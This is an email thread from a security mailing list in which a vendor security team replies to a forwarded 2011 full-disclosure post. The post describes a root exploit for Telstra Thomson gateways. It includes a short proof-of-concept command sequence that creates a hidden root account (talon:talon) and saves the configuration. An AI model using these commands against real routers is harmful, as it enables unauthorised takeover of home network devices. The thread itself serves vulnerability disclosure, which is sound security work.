Dear Mr secn3t, Thank you for porting this security issue to our attention. We will analyze your report about the aforementioned issue.
For your information, Technicolor products security issues may be reported to the following address: security_at_technicolor.com. So for you future potential findings, do not hesitate to directly contact us. Technicolor is making its best to avoid security issues in its products, but we never be 100% sure we missed no one. Best regards, Technicolor Security Team. -- Patrice Auffret | Security Assessment Coordinator Security and Content Protection Labs | Technology & Engineering +33 (0)2 99 27 3246 | +33 (0)6 81 98 8007 ----- Forwarded message from xD 0x41 <sec...@gmail.com> ----- Date: Fri, 29 Jul 2011 06:59:34 +1000 From: xD 0x41 <sec...@gmail.com> To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Telstra thompson gateway - root exploit (0day) Telstra thompson gateway - root exploit Telstra is an ISP here in Australia, it is also the same isp wich owns the NBN Author: Talon ( #haxnet member) PoC script: script add name addroot command user add name talon password talon role root descr ROOT script run name addroot pars saveall This would add a root user as talon:talon ,with complete control over the gateway and anything running from it. On behalf of talon, before it gets raped by some idling non @. cheers _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ----- End forwarded message ----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
